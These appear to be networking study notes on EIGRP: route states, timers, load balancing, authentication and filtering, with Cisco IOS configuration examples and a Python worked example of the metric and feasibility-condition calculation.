Going Active on a Route

When no FS route is found, the EIGRP router goes active for the route.
Once the router is active, EIGRP multicasts Query messages to its neighbors and waits for unicast Reply packets. Both are acknowledged using Ack messages.
When receiving a Query:

- If the router does not have an entry, it sends a Reply packet stating that it has no route.
- If the router has an entry, it sends a Reply packet with the details of the route.
- Otherwise, the router goes active.

The Diffusing Update Algorithm (DUAL) refers to the totality of the logic EIGRP uses to calculate new routes.

Stuck-in-Active

Any router in active state for a route must wait for a Reply to each of its Query messages.
EIGRP includes a timer called the Active timer. If it expires, the router places the route in the stuck-in-active state and also brings down any neighbors from which no Reply was received.

Limiting Query Scope

- Route summarization: the router immediately replies that it does not have that route.
- Stub routers: non-stub routers do not send Query messages to the stub routers.

EIGRP Configuration Example

R1(config)# router eigrp 1
R1(config-router)# eigrp log-neighbor-changes ! enabled by default
R1(config-router)# network 172.31.0.0 0.0.255.255
R1(config-router)# metric weights 0 0 0 1 0 0 ! delay active
R2(config)# int fa0/0
R2(config-if)# ip hello-interval eigrp 1 2 ! AS and hello-interval
R2(config-if)# ip hold-time eigrp 1 6
R2(config)# router eigrp 1
R2(config-router)# network 172.31.0.0 0.0.255.255
R2(config-router)# metric weights 0 0 0 1 0 0
R4(config)# int s0/0.1 point-to-point
R4(config-if)# bandwidth 64
R4(config-if)# ip bandwidth-percent eigrp 1 150 ! 150% for EIGRP traffic
R4(config)# router eigrp 1
R4(config-router)# passive-interface e0/0 ! no routes learned or advertised on e0/0
R4(config-router)# network 172.31.0.0 0.0.255.255
R4(config-router)# metric weights 0 0 0 1 0 0
R5(config)# router eigrp 1
R5(config-router)# network 172.31.0.0 0.0.255.255
R5(config-router)# eigrp stub connected summary

EIGRP timers

The default hello interval is 5 seconds; for NBMA interfaces with low bandwidth it is 60 seconds.
The hold time defaults to 3 times the default hello interval (15 or 180 seconds).

EIGRP Load Balancing

EIGRP allows for up to 6 equal-metric routes to be installed into the IP routing table.
The variance _multiplier_ command allows different metrics to be considered equal (metric < _multiplier_*FD). EIGRP allows only FS routes to be considered for addition as a result of using the variance command.

maximum-paths {1..6} (defaults to 4).
traffic-share balanced: more traffic to lower-metric routes.
traffic-share min: only use the lowest-metric route.
traffic-share min across-interfaces: for routes with the same metric, prefer those with different outgoing interfaces.
no traffic-share: balances evenly across routes.
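The definitions in "EIGRP Convergence" (RD, FD, FC, successor, feasible successor) and the variance rule above are best checked against numbers. The block below is an added example (my code, not the notes' and not IOS): it implements the classic EIGRP composite metric from the K values, evaluates a constructed set of three paths to one prefix, and then applies the variance multiplier with the strict `metric < variance * FD` rule stated in the notes. The router names, bandwidths and delays are constructed; the metric formula (10^7 / min bandwidth in kbps, integer-truncated, plus cumulative delay in tens of microseconds, times 256) and the default K values are the standard ones, and the page's `metric weights 0 0 0 1 0 0` is included as the delay-only variant.

```python
"""EIGRP composite metric, feasibility condition and variance.

Added example, not part of the original notes.  PATHS is a constructed
topology: for each neighbor of R1, the (bandwidth kbps, delay in tens of
usec) of R1's own link to it, and the (min bandwidth, total delay) that
neighbor advertises for the prefix.
"""

DEFAULT_K = (1, 0, 1, 0, 0)      # k1 k2 k3 k4 k5: bandwidth + delay
DELAY_ONLY_K = (0, 0, 1, 0, 0)   # the notes' "metric weights 0 0 0 1 0 0"


def eigrp_metric(bandwidth_kbps, delay_tens_usec, k=DEFAULT_K, load=1, reliability=255):
    """Classic EIGRP metric; IOS truncates 10^7 / bandwidth before scaling by 256."""
    k1, k2, k3, k4, k5 = k
    bw = 10_000_000 // bandwidth_kbps
    metric = k1 * bw + (k2 * bw) // (256 - load) + k3 * delay_tens_usec
    if k5:                                     # reliability term only when K5 != 0
        metric = metric * k5 // (reliability + k4)
    return metric * 256


PATHS = {
    "R2": {"link": (100000, 10), "advertised": (100000, 10)},   # FastEthernet on both hops
    "R3": {"link": (100000, 10), "advertised": (1544, 2000)},   # R3 reaches the prefix over a T1
    "R4": {"link": (1544, 2000), "advertised": (100000, 10)},   # T1 to R4, R4 on FastEthernet
}


def evaluate(paths, k=DEFAULT_K):
    """Per-neighbor RD and local metric, plus FD, successors and feasible successors."""
    table = {}
    for nbr, p in paths.items():
        link_bw, link_delay = p["link"]
        adv_bw, adv_delay = p["advertised"]
        rd = eigrp_metric(adv_bw, adv_delay, k)                       # neighbor's own metric
        metric = eigrp_metric(min(link_bw, adv_bw), link_delay + adv_delay, k)
        table[nbr] = {"rd": rd, "metric": metric}
    fd = min(e["metric"] for e in table.values())
    successors = [n for n, e in table.items() if e["metric"] == fd]
    # Feasibility condition: RD strictly lower than FD guarantees a loop-free path.
    feasible = [n for n, e in table.items() if n not in successors and e["rd"] < fd]
    return {"table": table, "fd": fd, "successors": successors, "feasible_successors": feasible}


def installed_routes(evaluation, variance=1, maximum_paths=4):
    """Successors plus feasible successors with metric < variance * FD, capped at maximum-paths."""
    limit = variance * evaluation["fd"]
    candidates = evaluation["successors"] + [
        n for n in evaluation["feasible_successors"]
        if evaluation["table"][n]["metric"] < limit
    ]
    candidates.sort(key=lambda n: evaluation["table"][n]["metric"])
    return candidates[:maximum_paths]


if __name__ == "__main__":
    ev = evaluate(PATHS)
    for nbr, e in ev["table"].items():
        print(f"{nbr}: RD={e['rd']:>8}  metric={e['metric']:>8}")
    print("FD", ev["fd"], "successors", ev["successors"], "FS", ev["feasible_successors"])
    for v in (1, 70, 71):
        print(f"variance {v}: {installed_routes(ev, v)}")
```

R3 and R4 end up with the same local metric (2172416), yet only R4 is a feasible successor: its RD (28160) is below the FD (30720), while R3's RD (2169856) is not, so no variance value will ever install the path through R3. That is the point of the FC: equal cost is not enough, the path must also be provably loop-free.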

EIGRP Authentication

EIGRP does not support clear-text authentication.
EIGRP uses MD5 authentication with a key chain. If multiple keys in a key chain overlap in time, EIGRP uses the key with the lowest key number.

R1(config)# key chain MYKEYCHAIN
R1(config-keychain)# key 1
R1(config-keychain-key)# key-string MYKEY-1
R1(config-keychain-key)# accept-lifetime 00:00:00 Jan 01 2012 00:00:00 Jan 01 2013
R1(config-keychain-key)# send-lifetime   00:00:00 Jan 01 2012 00:00:00 Jan 01 2013
R1(config-keychain)# key 2
R1(config-keychain-key)# key-string MYKEY-2
R1(config-keychain-key)# accept-lifetime 00:00:00 Jan 01 2013 00:00:00 Jan 01 2014
R1(config-keychain-key)# send-lifetime   00:00:00 Jan 01 2013 00:00:00 Jan 01 2014
R1(config)# int fa0/0
R1(config-if)# ip authentication mode eigrp 1 md5
R1(config-if)# ip authentication key-chain eigrp 1 MYKEYCHAIN

EIGRP Automatic Summarization

EIGRP defaults to use automatic summarization.
Use no auto-summary under router eigrp _asn_ to disable autosummarization.

EIGRP Split Horizon

Split horizon prevents a route from being readvertised out the interface on which it was received.
Most interface types enable split horizon by default.
It can be disabled with the no ip split-horizon eigrp _asn_ interface subcommand.

EIGRP Route Filtering

Using an ACL:
R1(config)# access-list 1 deny 172.31.196.0 0.0.3.255
R1(config)# access-list 1 permit any
R1(config)# router eigrp 1
R1(config-router)# distribute-list 1 in fa0/0
Using a prefix list:
R1(config)# ip prefix-list MYPREFIXLIST seq 5 deny 172.31.192.0/21 ge 30 le 30
R1(config)# ip prefix-list MYPREFIXLIST seq 10 permit 0.0.0.0/0 le 32
R1(config)# router eigrp 1
R1(config-router)# distribute-list prefix MYPREFIXLIST in fa0/0

An incoming filter prevents information from entering the EIGRP topology table.

EIGRP Offset Lists

Offset lists add an offset to the metric of routes matched by an ACL, either before sending an update or for routes received in an update.

Clearing the IP Routing Table

clear ip route * clears the IP routing table, but the router does not send any EIGRP message; it simply refills the IP routing table from the topology table.
clear ip eigrp neighbors clears all neighbor relationships, which clears the entire topology table. The neighbors then come back up, send new updates, and repopulate the topology and routing tables.

EIGRP messages

- Hello: identifies neighbors, exchanges parameters, keepalive function
- Update
- Ack: for Update, Query and Reply messages
- Query
- Reply
- Goodbye: notifies neighbors of a graceful shutdown